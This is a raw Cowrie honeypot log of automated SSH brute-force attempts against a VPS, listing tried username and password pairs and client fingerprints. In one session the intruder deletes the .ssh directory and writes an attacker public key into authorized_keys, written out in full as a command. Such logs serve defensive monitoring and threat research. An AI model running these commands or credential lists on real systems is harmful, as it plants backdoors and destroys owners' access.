{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:18:38.938509Z","src_ip":"212.227.235.229","session":"ec13190d660e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38414,"dst_ip":"1.2.3.4","dst_port":22,"session":"c64f13b46214","protocol":"ssh","message":"New connection: 212.227.235.229:38414 (1.2.3.4:22) [session: c64f13b46214]","sensor":"my-vps","timestamp":"2025-09-09T06:18:39.322978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:18:39.323871Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:18:39.566843Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.login.failed","username":"minecraft","password":"minecraft","message":"login attempt [minecraft/minecraft] failed","sensor":"my-vps","timestamp":"2025-09-09T06:18:39.654803Z","src_ip":"212.227.235.229","session":"ec13190d660e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test.1234567","message":"login attempt [root/Test.1234567] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:18:40.577728Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:18:40.840105Z","src_ip":"212.227.235.229","session":"ec13190d660e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:18:41.111197Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:18:41.111945Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:18:41.112925Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:18:41.599092Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:18:41.900179Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:18:41.900900Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:18:42.145773Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:18:42.146750Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39298,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b626efdc8a5","protocol":"ssh","message":"New connection: 212.227.235.229:39298 (1.2.3.4:22) [session: 4b626efdc8a5]","sensor":"my-vps","timestamp":"2025-09-09T06:18:42.392976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:18:42.393591Z","src_ip":"212.227.235.229","session":"4b626efdc8a5"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:18:42.638827Z","src_ip":"212.227.235.229","session":"4b626efdc8a5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:18:43.659717Z","src_ip":"212.227.235.229","session":"4b626efdc8a5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:18:44.907099Z","src_ip":"212.227.235.229","session":"4b626efdc8a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40210,"dst_ip":"1.2.3.4","dst_port":22,"session":"394e4e9bf699","protocol":"ssh","message":"New connection: 212.227.235.229:40210 (1.2.3.4:22) [session: 394e4e9bf699]","sensor":"my-vps","timestamp":"2025-09-09T06:18:45.152295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:18:45.153050Z","src_ip":"212.227.235.229","session":"394e4e9bf699"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:18:45.399431Z","src_ip":"212.227.235.229","session":"394e4e9bf699"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:18:46.428436Z","src_ip":"212.227.235.229","session":"394e4e9bf699"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:18:46.674592Z","src_ip":"212.227.235.229","session":"c64f13b46214"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:18:46.677521Z","src_ip":"212.227.235.229","session":"394e4e9bf699"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58325,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e3b445dba3c","protocol":"ssh","message":"New connection: 212.227.235.229:58325 (1.2.3.4:22) [session: 1e3b445dba3c]","sensor":"my-vps","timestamp":"2025-09-09T06:19:05.029350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:19:05.030253Z","src_ip":"212.227.235.229","session":"1e3b445dba3c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:19:05.434335Z","src_ip":"212.227.235.229","session":"1e3b445dba3c"}
{"eventid":"cowrie.login.failed","username":"james","password":"james","message":"login attempt [james/james] failed","sensor":"my-vps","timestamp":"2025-09-09T06:19:07.009822Z","src_ip":"212.227.235.229","session":"1e3b445dba3c"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:19:08.380760Z","src_ip":"212.227.235.229","session":"1e3b445dba3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52746,"dst_ip":"1.2.3.4","dst_port":22,"session":"99b3580962b6","protocol":"ssh","message":"New connection: 212.227.235.229:52746 (1.2.3.4:22) [session: 99b3580962b6]","sensor":"my-vps","timestamp":"2025-09-09T06:19:08.762320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:19:08.763366Z","src_ip":"212.227.235.229","session":"99b3580962b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:19:08.833663Z","src_ip":"212.227.235.229","session":"99b3580962b6"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"2025","message":"login attempt [dspace/2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:19:09.143459Z","src_ip":"212.227.235.229","session":"99b3580962b6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:19:10.213785Z","src_ip":"212.227.235.229","session":"99b3580962b6"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":47804,"dst_ip":"1.2.3.4","dst_port":22,"session":"91ee55761192","protocol":"ssh","message":"New connection: 157.20.207.165:47804 (1.2.3.4:22) [session: 91ee55761192]","sensor":"my-vps","timestamp":"2025-09-09T06:19:10.293098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:19:10.293840Z","src_ip":"157.20.207.165","session":"91ee55761192"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:19:10.478241Z","src_ip":"157.20.207.165","session":"91ee55761192"}
{"eventid":"cowrie.login.failed","username":"node","password":"Password1","message":"login attempt [node/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:19:11.252444Z","src_ip":"157.20.207.165","session":"91ee55761192"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:19:12.439520Z","src_ip":"157.20.207.165","session":"91ee55761192"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40344,"dst_ip":"1.2.3.4","dst_port":22,"session":"9054097af003","protocol":"ssh","message":"New connection: 212.227.235.229:40344 (1.2.3.4:22) [session: 9054097af003]","sensor":"my-vps","timestamp":"2025-09-09T06:19:55.645940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:19:55.649553Z","src_ip":"212.227.235.229","session":"9054097af003"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:19:55.829210Z","src_ip":"212.227.235.229","session":"9054097af003"}
{"eventid":"cowrie.login.failed","username":"status","password":"111","message":"login attempt [status/111] failed","sensor":"my-vps","timestamp":"2025-09-09T06:19:56.557564Z","src_ip":"212.227.235.229","session":"9054097af003"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:19:57.741902Z","src_ip":"212.227.235.229","session":"9054097af003"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36000,"dst_ip":"1.2.3.4","dst_port":22,"session":"32de8f9cc7f2","protocol":"ssh","message":"New connection: 212.227.235.229:36000 (1.2.3.4:22) [session: 32de8f9cc7f2]","sensor":"my-vps","timestamp":"2025-09-09T06:20:06.903325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:20:06.904011Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:20:07.149960Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
{"eventid":"cowrie.login.success","username":"root","password":"aaaaaa","message":"login attempt [root/aaaaaa] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:20:08.172446Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
